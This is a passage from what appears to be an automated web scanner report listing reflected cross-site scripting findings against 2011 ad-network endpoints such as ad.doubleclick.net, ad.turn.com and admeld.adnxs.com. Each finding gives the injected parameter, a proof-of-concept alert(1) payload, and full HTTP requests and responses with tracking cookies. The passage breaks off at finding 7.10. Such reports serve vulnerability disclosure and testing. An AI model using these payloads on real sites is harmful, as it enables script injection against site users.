GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT6a68d"-alert(1)-"b83921a49ea&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:26:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8907

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT6a68d"-alert(1)-"b83921a49ea&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyN
...[SNIP]...

7.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e083d"-alert(1)-"fd19c0fdbf9 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088e083d"-alert(1)-"fd19c0fdbf9&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:28:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8907

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088e083d"-alert(1)-"fd19c0fdbf9&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSp
...[SNIP]...

7.4. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f777b"-alert(1)-"69d52534c85 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1f777b"-alert(1)-"69d52534c85&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:27:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8907

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
mh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1f777b"-alert(1)-"69d52534c85&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0
...[SNIP]...

7.5. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f37f3"-alert(1)-"174e9b66d51 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fgf37f3"-alert(1)-"174e9b66d51&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:27:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8907

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fgf37f3"-alert(1)-"174e9b66d51&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwy
...[SNIP]...

7.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a167"-alert(1)-"e2b4b064d7c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l2a167"-alert(1)-"e2b4b064d7c&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:26:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8907

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
/click%3Bh%3Dv8/3afb/f/2e6/%2a/b%3B239944784%3B0-0%3B0%3B62578498%3B2321-160/600%3B41336049/41353836/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l2a167"-alert(1)-"e2b4b064d7c&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5o
...[SNIP]...

7.7. http://ad.doubleclick.net/adj/wpni.jobs/front [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.jobs/front

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de551'%3balert(1)//17b4bcec7f4 was submitted in the sz parameter. This input was echoed as de551';alert(1)//17b4bcec7f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/wpni.jobs/front;sz=de551'%3balert(1)//17b4bcec7f4 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 355
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 01 May 2011 23:34:06 GMT
Expires: Sun, 01 May 2011 23:39:06 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3afa/0/0/%2a/d;240396230;0-0;0;5742660;255-0/0;41867457/41885244/1;;~okv=;sz=de551';alert(1)//17b4bcec7f4;~aopt=2/1/ff/1;~sscs=%3fhttp://www.esri.com/washpostrecruit">
...[SNIP]...

7.8. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6123"><script>alert(1)</script>730c7e9bf00 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=b6123"><script>alert(1)</script>730c7e9bf00 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 29-Oct-2011 02:20:17 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 02:20:16 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=9099190985727552127&fpid=b6123"><script>alert(1)</script>730c7e9bf00&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

7.9. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dffab'-alert(1)-'addbfb1145 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193dffab'-alert(1)-'addbfb1145&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYAiACKAIw447n7QQQ447n7QQYAQ..; anj=Kfw))ByDuq(FJl:c9U(O<@CeVOmEXW1hL>#/*4Jn(uor=(5EBh5<W.k)Y><WiS:LOiybjU0r>wWIql]AvGq/IdS!acC(FaP$cYJ!J#h1Y$?7kmw?YIqgimiBWWi-dkyfpjFRO44ek(e!)zV^HsoI@m5(lVJ]-z44hi<@/+Gxw$#QV%Etka*a%eva$=@Au!AJSu6uj*@oO@]EL5n0EQo`R]:t/`eU_45K!c^VKH`O2$i'@`s.wMV-wH9)D=aab*.arK7xs@L$@.CbO?Kb?0ZuKR(FN+u4M#Er2:Iua<E_XvS:>yEy6m-9JBYXUm+V1/.@>oBLAQ/P^+8=*EjA[(GADvf*BbS#E1e?YTKA$'LPYDp0.fkASgZh0i(^P[N`AV7o.$d3BYa-u[VwBx:I(G/:381kcgHWoswb:=`Ku>u@Cidi%Y$u9`qSJ<7rlOS'j/U/>:p6qkC9x[=9>gzl!f)'vJRUdB!F`KgLFB[sgim_V^-4E!hC:TT[Mnnesvth<EqmD]T6X<+EXw*eL#7V._]eR7wKz#+Q<jY0)9m4.Ux(+g2x6gtKj2Uf7bK$d-7jQI=`H%cII=9QVL!LY6%gg!la[qizZ#JNdA3x'%jK#?C9j?>vs79'K>b2_7w$cAnjrNM]; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 03-May-2011 02:12:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 31-Jul-2011 02:12:10 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 02:12:10 GMT
Content-Length: 182

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193dffab'-alert(1)-'addbfb1145&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

7.10. http://admeld.adnxs.com/usersync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed4bf'-alert(1)-'94e964e747d was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

